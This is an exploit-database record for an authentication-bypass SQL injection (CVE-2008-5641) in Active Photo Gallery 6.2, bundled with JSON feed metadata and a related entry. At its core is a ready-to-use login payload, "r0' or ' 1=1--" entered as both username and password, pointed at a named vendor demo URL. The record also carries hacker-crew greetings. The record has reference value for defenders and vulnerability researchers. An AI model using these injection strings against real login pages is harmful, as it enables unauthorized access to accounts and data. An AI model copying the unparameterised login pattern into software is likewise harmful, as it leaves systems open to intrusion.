ID EDB-ID:7299
Type exploitdb
Reporter R3d-D3V!L
Modified 2008-11-30T00:00:00
Description
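Active Photo Gallery 6.2 (Auth Bypass) SQL Injection Vulnerability. CVE-2008-5641. Webapps exploit for php platform. Note: the feed's "php" label conflicts with the rest of this record: the affected script is account.asp, and the related entry EDB-ID:10521 is listed for the asp platform. Per the CVE entry below, the injection is through the username and password parameters of account.asp (CWE-89); the login query should bind those values as parameters rather than build SQL text from them.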
[~] ----------------------------بسم الله الرحمن الرحيم------------------------------
[~]Tybe:(Auth Bypass) Remote SQL Injection Vulnerability
[~]Vendor:www.activewebsoftwares.com
[~]Software: Active Photo Gallery v 6.2
[~]author: ((я3d D3v!L))
[~] Date: 28.11.2008
[~] Home: www.ahacker.biz
[~] contact: N/A
[~] -----------------------------{str0ke}------------------------------
[~] Exploit:
username: r0' or ' 1=1--
password: r0' or ' 1=1--
[~]login 4 d3m0:
http://www.activewebsoftwares.com/demoactivephotogallery/account.asp
[~]-----------------------------{str0ke}---------------------------------------------------
[~] Greetz tO: {str0ke} & maxmos & EV!L KS@ & hesham_hacker
[~]
[~] spechial thanks : dolly & 7am3m & عماد ,الزهيري
[~]
[~] EV!L !NS!D3 734M --- R3d-D3v!L--EXOT!C --poison scorbion --samakiller
[~]
[~] xp10.biz & ahacker.biz
[~]
[~]--------------------------------------------------------------------------------
# milw0rm.com [2008-11-30]
{"id": "EDB-ID:7299", "type": "exploitdb", "bulletinFamily": "exploit", "title": "Active Photo Gallery 6.2 Auth Bypass SQL Injection Vulnerability", "description": "Active Photo Gallery 6.2 (Auth Bypass) SQL Injection Vulnerability. CVE-2008-5641. Webapps exploit for php platform", "published": "2008-11-30T00:00:00", "modified": "2008-11-30T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://www.exploit-db.com/exploits/7299/", "reporter": "R3d-D3V!L", "references": [], "cvelist": ["CVE-2008-5641"], "lastseen": "2016-02-01T01:54:16", "viewCount": 6, "enchantments": {"score": {"value": 7.6, "vector": "NONE", "modified": "2016-02-01T01:54:16", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2008-5641"]}, {"type": "exploitdb", "idList": ["EDB-ID:10521"]}], "modified": "2016-02-01T01:54:16", "rev": 2}, "vulnersScore": 7.6}, "sourceHref": "https://www.exploit-db.com/download/7299/", "sourceData": "[~] ----------------------------\u00d8\u00a8\u00d8\u00b3\u00d9\u2026 \u00d8\u00a7\u00d9\u201e\u00d9\u201e\u00d9\u2021 \u00d8\u00a7\u00d9\u201e\u00d8\u00b1\u00d8\u00ad\u00d9\u2026\u00d9\u2020 \u00d8\u00a7\u00d9\u201e\u00d8\u00b1\u00d8\u00ad\u00d9\u0160\u00d9\u2026------------------------------\n [~]Tybe:(Auth Bypass) Remote SQL Injection Vulnerability\n \n [~]Vendor:www.activewebsoftwares.com\n \n [~]Software: Active Photo Gallery v 6.2\n \n [~]author: ((\u00d1\u008f3d D3v!L))\n \n [~] Date: 28.11.2008\n \n [~] Home: www.ahacker.biz\n \n [~] contact: N/A\n\n[~] -----------------------------{str0ke}------------------------------\n \n \n [~] Exploit:\n \n username: r0' or ' 1=1--\n password: r0' or ' 1=1--\n \n \n [~]login 4 d3m0:\n \n http://www.activewebsoftwares.com/demoactivephotogallery/account.asp\n \n [~]-----------------------------{str0ke}---------------------------------------------------\n \n [~] Greetz tO: {str0ke} & maxmos & EV!L KS@ & hesham_hacker\n [~]\n [~] spechial 
thanks : dolly & 7am3m & \u00d8\u00b9\u00d9\u2026\u00d8\u00a7\u00d8\u00af ,\u00d8\u00a7\u00d9\u201e\u00d8\u00b2\u00d9\u2021\u00d9\u0160\u00d8\u00b1\u00d9\u0160\n [~]\n [~] EV!L !NS!D3 734M --- R3d-D3v!L--EXOT!C --poison scorbion --samakiller\n [~]\n [~] xp10.biz & ahacker.biz\n [~]\n \n [~]--------------------------------------------------------------------------------\n\n# milw0rm.com [2008-11-30]\n", "osvdbidlist": ["50388"]}
{"cve": [{"lastseen": "2020-10-03T11:51:04", "description": "SQL injection vulnerability in account.asp in Active Photo Gallery 6.2 allows remote attackers to execute arbitrary SQL commands via the (1) username and (2) password parameters.", "edition": 3, "cvss3": {}, "published": "2008-12-17T17:30:00", "title": "CVE-2008-5641", "type": "cve", "cwe": ["CWE-89"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": true, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2008-5641"], "modified": "2017-09-29T01:32:00", "cpe": ["cpe:/a:activewebsoftwares:active_photo_gallery:6.2"], "id": "CVE-2008-5641", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-5641", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:activewebsoftwares:active_photo_gallery:6.2:*:*:*:*:*:*:*"]}], "exploitdb": [{"lastseen": "2016-02-01T12:39:58", "description": "Active Photo Gallery v 6.2 (Auth Bypass) Remote SQL Injection. CVE-2008-5641. Webapps exploit for asp platform", "published": "2009-12-17T00:00:00", "type": "exploitdb", "title": "Active Photo Gallery 6.2 - Auth Bypass Remote SQL Injection", "bulletinFamily": "exploit", "cvelist": ["CVE-2008-5641"], "modified": "2009-12-17T00:00:00", "id": "EDB-ID:10521", "href": "https://www.exploit-db.com/exploits/10521/", "sourceData": "[?] ?????????????????????????{In The Name Of Allah The Mercifull}??????????????????????\r\n[?]\r\n[~] Tybe: (Auth Bypass) Remote SQL Injection Vulnerability‏\r\n[?]\r\n[~] Vendor: www.activewebsoftwares.com\r\n[?]\r\n[?] 
Software: Active Photo Gallery v 6.2\r\n[?]\r\n[?] author: ((R3d-D3v!L))\r\n[?]\r\n[?] Date: 17.dec.2009\r\n[?] T!ME: 10:22 pm\r\n[?] Home: WwW.xP10.ME\r\n[?]\r\n[?] contact: X@hotmail.co.jp\r\n[?]??????????????????????{DEV!L'5 of SYST3M}??????????????????\r\n\r\n\r\n[?] Exploit:\r\n\r\n\r\n\r\n[?] E-/\\/\\A!L : x' or ' 1=1\r\n\r\n[?] password : x' or ' 1=1\r\n\r\n\r\n\r\n[?]demo:\r\n\r\n\r\n[?]https://server/demoactivephotogallery/account.asp\r\n\r\n\r\n\r\nN073:\r\nREAL RED DEV!L W@S h3r3 LAMERZ\r\n\r\nGAZA !N our hearts !\r\n\r\n\r\n\r\n[~]-----------------------------{D3V!L5 0F 7h3 SYS73M!?!}-----------------------------------------------------\r\n\r\n[~] Greetz tO: dolly & L!TTLE 547r & 0r45hy & DEV!L_MODY & po!S!ON Sc0rp!0N & mAG0ush_1987\r\n\r\n[~]70 ِALL ARAB!AN HACKER 3X3PT : LAM3RZ\r\n\r\n[~] spechial thanks : ab0 mohammed & XP_10 h4CK3R & JASM!N & c0prA & MARWA & N0RHAN & S4R4\r\n\r\n[?]spechial SupP0RT: MY M!ND ;) & dookie2000ca & ((OFFsec))\r\n\r\n[?]4r48!4n.!nforma7!0N.53cur!7y ---> ((r3d D3v!L))--M2Z--DEV!L_Ro07--JUPA\r\n\r\n[~]spechial FR!ND: 74M3M\r\n\r\n[~] !'M 4R48!4N 3XPL0!73R.\r\n\r\n[~]{[(D!R 4ll 0R D!E)]};\r\n\r\n[~]--------------------------------------------------------------------------------", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/10521/"}]}